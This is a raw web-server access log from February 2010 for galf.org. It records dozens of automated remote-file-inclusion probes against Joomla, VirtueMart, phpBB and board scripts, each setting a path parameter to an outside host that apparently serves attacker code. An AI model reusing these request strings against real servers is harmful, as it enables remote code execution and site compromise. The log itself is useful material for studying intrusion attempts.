210.127.209.105 - - [15/Feb/2010:03:19:46 -0800] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:20:02 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:20:04 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:20:04 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:20:12 -0800] "GET /logs/access_090817.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:20:12 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:20:36 -0800] "GET /logs/access_091207.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:20:56 -0800] "GET /logs/access_090914.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:20:56 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:20:56 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:20:56 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:20:56 -0800] "GET /logs/access_090817.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:21:04 -0800] "GET /logs/access_091109.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:21:21 -0800] "GET /logs/access_091012.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:21:53 -0800] "GET /logs/access_090713.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:21:54 -0800] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:22:06 -0800] "GET /logs/access_090727.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:22:06 -0800] "GET /logs/access_091207.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:22:06 -0800] "GET /logs/access_091005.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:22:06 -0800] "GET /logs/access_090928.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:22:47 -0800] "GET /logs/access_100118.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:23:11 -0800] "GET /logs/access_091109.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:23:15 -0800] "GET /logs/access_091019.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
219.240.36.36 - - [15/Feb/2010:03:23:37 -0800] "GET /extcalendar.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:23:40 -0800] "GET /logs/access_090810.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:24:03 -0800] "GET /logs/access_090817.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:24:29 -0800] "GET /logs/access_091012.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:03:25:09 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:03:25:09 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:25:11 -0800] "GET /logs/access_090713.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
78.110.50.102 - - [15/Feb/2010:03:26:12 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.102 - - [15/Feb/2010:03:26:12 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.102 - - [15/Feb/2010:03:26:12 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:26:18 -0800] "GET /logs/access_100111.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:26:23 -0800] "GET /logs//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:26:23 -0800] "GET /functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
78.110.50.102 - - [15/Feb/2010:03:26:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.102 - - [15/Feb/2010:03:26:34 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.102 - - [15/Feb/2010:03:26:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:03:26:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:03:26:37 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:03:26:37 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:03:27:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:03:27:11 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:03:27:11 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.161.133.1 - - [15/Feb/2010:03:27:18 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.161.133.1 - - [15/Feb/2010:03:27:19 -0800] "GET /delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.161.133.1 - - [15/Feb/2010:03:27:19 -0800] "GET /logs/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
219.240.36.36 - - [15/Feb/2010:03:27:22 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:27:53 -0800] "GET /logs/access_091214.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:03:28:05 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:03:28:08 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:28:27 -0800] "GET /logs/access_100111.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
69.161.133.1 - - [15/Feb/2010:03:28:36 -0800] "GET /logs/access_100201.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.161.133.1 - - [15/Feb/2010:03:28:45 -0800] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:28:48 -0800] "GET /logs/access_090831.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:29:04 -0800] "GET /logs/access_090824.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:29:04 -0800] "GET /logs/access_091116.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:29:19 -0800] "GET /logs/access_100118.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:29:20 -0800] "GET /logs/access_090713.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:29:24 -0800] "GET /logs/access_091207.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
61.250.92.167 - - [15/Feb/2010:03:29:57 -0800] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.250.92.167 - - [15/Feb/2010:03:29:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.250.92.167 - - [15/Feb/2010:03:29:58 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:30:03 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:30:04 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:30:06 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:30:12 -0800] "GET /logs/access_100125.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
221.139.0.75 - - [15/Feb/2010:03:30:13 -0800] "GET /setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [15/Feb/2010:03:30:13 -0800] "GET /logs/access_091123.log/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [15/Feb/2010:03:30:13 -0800] "GET /logs/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.250.92.167 - - [15/Feb/2010:03:30:16 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:30:24 -0800] "GET /logs/access_090914.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
123.143.29.250 - - [15/Feb/2010:03:30:30 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [15/Feb/2010:03:30:31 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [15/Feb/2010:03:30:31 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:30:42 -0800] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:30:43 -0800] "GET /logs/access_091109.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:30:43 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:30:43 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:31:08 -0800] "GET /logs/access_090817.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:31:09 -0800] "GET /logs/access_091109.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:31:10 -0800] "GET /logs/access_091221.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:03:31:32 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:03:31:32 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:03:31:32 -0800] "GET /logs/access_090921.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:31:36 -0800] "GET /logs/access_091207.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:03:31:59 -0800] "GET /logs/access_090803.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.105 - - [15/Feb/2010:03:32:01 -0800] "GET /logs/access.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
75.125.84.226 - - [15/Feb/2010:03:32:07 -0800] "GET /logs/access_100201.log//delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [15/Feb/2010:03:32:07 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [15/Feb/2010:03:32:08 -0800] "GET /delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:32:14 -0800] "GET /logs/access_090928.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
75.125.84.226 - - [15/Feb/2010:03:32:18 -0800] "GET /logs/access_100125.log//delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:32:19 -0800] "GET /logs/access_091005.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:32:21 -0800] "GET /logs/access_091228.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.7.235.75 - - [15/Feb/2010:03:32:22 -0800] "GET /logs/access_090720.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.250.92.167 - - [15/Feb/2010:03:32:22 -0800] "GET /logs/access_090817.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.250.92.167 - - [15/Feb/2010:03:32:39 -0800] "GET /logs/access_091012.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
82.76.12.197 - - [15/Feb/2010:03:33:06 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.steklo-vsem.ru/imagess/all.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
82.76.12.197 - - [15/Feb/2010:03:33:06 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.steklo-vsem.ru/imagess/all.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
